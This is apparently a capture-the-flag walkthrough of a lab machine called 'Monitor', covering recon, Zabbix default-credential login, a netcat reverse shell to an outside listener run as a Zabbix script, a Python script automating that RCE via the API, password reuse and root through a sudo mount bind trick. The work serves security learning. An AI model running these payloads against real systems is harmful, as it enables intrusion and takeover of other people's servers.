Information gathering
```sh
┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.31.92   08:00:27:1d:29:60   PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.31.92
```
```sh
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-10 08:34 EDT
Nmap scan report for Monitor (192.168.31.92)
Host is up (0.00059s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: \xE7\x9B\x91\xE6\x8E\xA7\xE7\xB3\xBB\xE7\xBB\x9F\xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36034/udp6  mountd
|   100005  1,2,3      38236/udp   mountd
|   100005  1,2,3      38947/tcp6  mountd
|   100005  1,2,3      41683/tcp   mountd
|   100021  1,3,4      32829/tcp6  nlockmgr
|   100021  1,3,4      33419/tcp   nlockmgr
|   100021  1,3,4      41563/udp   nlockmgr
|   100021  1,3,4      60724/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs     3-4 (RPC #100003)
MAC Address: 08:00:27:1D:29:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms Monitor (192.168.31.92)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.21 seconds
```

The escaped http-title decodes to 监控系统登录 ("monitoring system login"). Besides SSH and HTTP, the box exposes rpcbind (111) and NFS (2049); this writeup does not go after them and goes through the web side instead.
Directory scanning
```sh
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.31.92
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,bk,bak,tar,php3,zip,gz,shtml,php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 1841]
/upload               (Status: 301) [Size: 315] [--> http://192.168.31.92/upload/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
/zabbix               (Status: 301) [Size: 315] [--> http://192.168.31.92/zabbix/]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
```
Opening the site in a browser and trying to log in, I tried the weak password admin/admin at random and got in, but there was nothing useful there. The scan turned up /zabbix; a quick search shows its default credentials are Admin/zabbix. Under Administration - Scripts, create a script:

```sh
nc 192.168.31.58 23333 -e /bin/sh
```

(The `-e` option needs a netcat build that supports it, such as netcat-traditional; the OpenBSD variant does not have it.) Start a listener on Kali, then under Monitoring - Hosts run the script against a host to get a reverse shell.
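The same global-script RCE can be driven through the Zabbix JSON-RPC API instead of clicking through Administration - Scripts and Monitoring - Hosts. The script below is an added example, not code from the original post: it assumes a Zabbix 6.0-series API at `/zabbix/api_jsonrpc.php` (login takes a `user` field and the session token travels in the `auth` body field) and the default Admin/zabbix credentials from the post; the script name, the choice of the first monitored host and the timeout are my own, and the listener address and port are the ones used above.

```python
# Added example (not from the original writeup): the Zabbix global-script RCE,
# driven through the JSON-RPC API instead of the web UI. Assumes a Zabbix 6.0-series
# API (login takes "user"; the session token travels in the "auth" body field) and the
# default Admin/zabbix credentials from the post. Script name, target selection and
# timeout are my own choices; the listener address/port are the ones used in the post.
import json
import urllib.request

API_URL = "http://192.168.31.92/zabbix/api_jsonrpc.php"
LISTENER = ("192.168.31.58", 23333)


def rpc(method, params, auth=None, req_id=1):
    """Build one JSON-RPC 2.0 request body in the shape Zabbix expects."""
    body = {"jsonrpc": "2.0", "method": method, "params": params, "id": req_id}
    if auth is not None:          # user.login and apiinfo.version are called unauthenticated
        body["auth"] = auth
    return body


def login_request(user, password):
    # 6.4+ renamed "user" to "username"; 7.0 moved the token to an Authorization: Bearer header.
    return rpc("user.login", {"user": user, "password": password})


def reverse_shell_command(host, port):
    # Same payload as the GUI step; -e needs a netcat build that supports it (netcat-traditional).
    return f"nc {host} {port} -e /bin/sh"


def create_script_request(auth, name, command):
    # type 0 = script, scope 2 = manual host action (required for script.execute on a host),
    # execute_on 1 = run on the Zabbix server, consistent with the shell landing as zabbix@Monitor.
    params = {"name": name, "command": command, "type": 0, "scope": 2, "execute_on": 1}
    return rpc("script.create", params, auth)


def execute_script_request(auth, scriptid, hostid):
    return rpc("script.execute", {"scriptid": scriptid, "hostid": hostid}, auth)


def send(body):
    """POST one request and return its result, raising on a JSON-RPC error."""
    data = json.dumps(body).encode()
    req = urllib.request.Request(API_URL, data=data,
                                 headers={"Content-Type": "application/json-rpc"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        reply = json.load(resp)
    if "error" in reply:
        raise RuntimeError(reply["error"])
    return reply["result"]


def main():
    auth = send(login_request("Admin", "zabbix"))
    # Any monitored host will do: with execute_on=1 the command runs on the server regardless.
    hosts = send(rpc("host.get", {"output": ["hostid", "host"]}, auth))
    hostid = hosts[0]["hostid"]
    created = send(create_script_request(auth, "rs", reverse_shell_command(*LISTENER)))
    scriptid = created["scriptids"][0]
    # Blocks until the command returns or the server-side timeout expires; with a reverse
    # shell attached it normally times out, which is fine, the shell is already connected.
    print(send(execute_script_request(auth, scriptid, hostid)))


if __name__ == "__main__":
    main()
```

Start `nc -lvnp 23333` on the attacking box before running it. The point worth keeping in mind is that the API and the web UI share one privilege model: anyone holding a Zabbix super-admin session, default credentials included, gets command execution as the zabbix OS account on the server or on any agent with remote commands enabled, so on a real deployment the fix is changing the Admin password and restricting global scripts, not hiding the UI.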

The user flag is in /home/hyh/user.txt:

```
flag{user-ab0e0561b1a833a6141ad2273744543c}
```
Privilege escalation
The netcat shell we have now is non-interactive and awkward to work in, so first stabilize it. Run these in order:

```sh
script /dev/null -c bash      # allocate a pty for the remote shell
# press Ctrl+Z to background the shell locally
stty raw -echo; fg            # hand raw keystrokes through to the remote, then resume it
reset xterm                   # reinitialize the terminal
export TERM=xterm
export SHELL=/bin/bash
```
Look at the Zabbix web frontend configuration file
```php
zabbix@Monitor:/$ find / -name 'zabbix.conf.php' 2>/dev/null
/usr/share/zabbix/conf/zabbix.conf.php
/etc/zabbix/web/zabbix.conf.php
zabbix@Monitor:/$ cat /usr/share/zabbix/conf/zabbix.conf.php
<?php
// Zabbix GUI configuration file.

$DB['TYPE']     = 'MYSQL';
$DB['SERVER']   = 'localhost';
$DB['PORT']     = '0';
$DB['DATABASE'] = 'zabbix';
$DB['USER']     = 'zabbix';
$DB['PASSWORD'] = 'root123';

// Schema name. Used for PostgreSQL.
$DB['SCHEMA'] = '';

// Used for TLS connection.
$DB['ENCRYPTION']  = false;
$DB['KEY_FILE']    = '';
$DB['CERT_FILE']   = '';
$DB['CA_FILE']     = '';
$DB['VERIFY_HOST'] = false;
$DB['CIPHER_LIST'] = '';

// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT_URL']     = '';
$DB['VAULT_DB_PATH'] = '';
$DB['VAULT_TOKEN']   = '';

// Use IEEE754 compatible value range for 64-bit Numeric (float) history values.
// This option is enabled by default for new Zabbix installations.
// For upgraded installations, please read database upgrade notes before enabling this option.
$DB['DOUBLE_IEEE754'] = true;

// Uncomment and set to desired values to override Zabbix hostname/IP and port.
// $ZBX_SERVER = '';
// $ZBX_SERVER_PORT = '';

$ZBX_SERVER_NAME = 'Zabbix';

$IMAGE_FORMAT_DEFAULT = IMAGE_FORMAT_PNG;

// Uncomment this block only if you are using Elasticsearch.
// Elasticsearch url (can be string if same url is used for all types).
//$HISTORY['url'] = [
//  'uint' => 'http://localhost:9200',
//  'text' => 'http://localhost:9200'
//];
// Value types stored in Elasticsearch.
//$HISTORY['types'] = ['uint', 'text'];

// Used for SAML authentication.
// Uncomment to override the default paths to SP private key, SP and IdP X.509 certificates, and to set extra settings.
//$SSO['SP_KEY'] = 'conf/certs/sp.key';
//$SSO['SP_CERT'] = 'conf/certs/sp.crt';
//$SSO['IDP_CERT'] = 'conf/certs/idp.crt';
//$SSO['SETTINGS'] = [];
```
The database password is root123. There is a directory hyh under /home, so try that password for the user hyh (plain credential reuse). Two things to note in passing: the file stores the DB password in plaintext (the Vault settings are all empty), and it was readable by the zabbix service account even though only the web server account, which runs the PHP frontend, needs to read it.
```sh
zabbix@Monitor:/$ ls /home
hyh
zabbix@Monitor:/$ su hyh
Password:
hyh@Monitor:/$ id
uid=1000(hyh) gid=1000(hyh) groups=1000(hyh)
```
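Pulling the DB block out of a looted zabbix.conf.php and judging it is routine enough to script. The following is an added example, not part of the original writeup: it parses the `$DB['KEY'] = value;` lines (skipping commented-out ones), returns the user/password pair that the post goes on to reuse against hyh, and applies a few review rules of my own (plaintext password without Vault, remote DB without TLS, TLS without hostname verification). SAMPLE_CONF is a constructed excerpt mirroring the settings shown above, not the real file.

```python
# Added example (not from the original writeup): pull the DB block out of a looted
# zabbix.conf.php and point out what is wrong with it. SAMPLE_CONF is a constructed
# excerpt mirroring the $DB settings shown in the post; the audit rules are my own.
import re

SAMPLE_CONF = """<?php
// Zabbix GUI configuration file.

$DB['TYPE']     = 'MYSQL';
$DB['SERVER']   = 'localhost';
$DB['PORT']     = '0';
$DB['DATABASE'] = 'zabbix';
$DB['USER']     = 'zabbix';
$DB['PASSWORD'] = 'root123';

// Used for TLS connection.
$DB['ENCRYPTION'] = false;
$DB['VERIFY_HOST'] = false;

// Vault configuration. Used if database credentials are stored in Vault secrets manager.
$DB['VAULT_URL']     = '';
$DB['VAULT_DB_PATH'] = '';
$DB['VAULT_TOKEN']   = '';

$DB['DOUBLE_IEEE754'] = true;
// $DB['PASSWORD'] = 'commented-out-and-ignored';
"""

# One assignment per line: $DB['KEY'] = 'str' | "str" | true | false ;
# Anchored at line start so // commented lines are skipped.
_ASSIGN = re.compile(
    r"""^[ \t]*\$DB\[['"](\w+)['"]\][ \t]*=[ \t]*(?:'([^']*)'|"([^"]*)"|(true|false))[ \t]*;""",
    re.MULTILINE,
)


def parse_db_config(text):
    """Return {KEY: value} with PHP booleans mapped to Python bool, strings kept as str."""
    cfg = {}
    for key, single, double, boolean in _ASSIGN.findall(text):
        if boolean:
            cfg[key] = boolean == "true"
        else:
            cfg[key] = single or double   # whichever quote style matched; '' if empty
    return cfg


def db_credentials(cfg):
    """(user, password) pair worth trying elsewhere, as the post does with su hyh."""
    return cfg.get("USER", ""), cfg.get("PASSWORD", "")


def audit(cfg):
    """Findings a reviewer would raise about the DB block; empty list means nothing flagged."""
    findings = []
    remote = cfg.get("SERVER", "") not in ("", "localhost", "127.0.0.1", "::1")
    if cfg.get("PASSWORD") and not cfg.get("VAULT_URL"):
        findings.append("DB password stored in plaintext; no Vault configured (VAULT_URL is empty)")
    if remote and cfg.get("ENCRYPTION") is False:
        findings.append(f"DB connection to {cfg['SERVER']} is unencrypted (ENCRYPTION=false)")
    if cfg.get("ENCRYPTION") is True and cfg.get("VERIFY_HOST") is False:
        findings.append("TLS enabled but VERIFY_HOST=false: server certificate name is not checked")
    return findings


if __name__ == "__main__":
    cfg = parse_db_config(SAMPLE_CONF)
    print("credentials:", db_credentials(cfg))
    for finding in audit(cfg):
        print("finding:", finding)
```

The TLS rule deliberately stays quiet for a localhost database, as on this box, since a loopback connection gains nothing from encryption; the plaintext-password rule fires regardless, because the real fix for what happened next in this writeup is not a stronger file mode but keeping the secret out of the file (Vault) and not sharing it with a login account.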
Check sudo privileges
```sh
hyh@Monitor:/$ sudo -l
Matching Defaults entries for hyh on Monitor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hyh may run the following commands on Monitor:
    (ALL) NOPASSWD: /usr/bin/mount
```
Privilege escalation via mount. The rule allows /usr/bin/mount with any arguments, so bind-mount /bin/sh over /bin/mount; the next `sudo mount` then executes /bin/sh as root. It works here because /bin is a symlink to /usr/bin (merged /usr on Debian), so the path sudo runs is exactly the one that was shadowed. Until you run `umount /bin/mount` from the root shell, the real mount binary is hidden system-wide.
```sh
hyh@Monitor:/$ sudo mount -o bind /bin/sh /bin/mount
hyh@Monitor:/$ sudo mount
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
flag{root-deb15d884e04de6f6972b3c25e3cc11b}
```
```
flag{root-deb15d884e04de6f6972b3c25e3cc11b}
```


Aristore
Unless otherwise noted, all articles on this blog are original; reproduction without permission is strictly prohibited.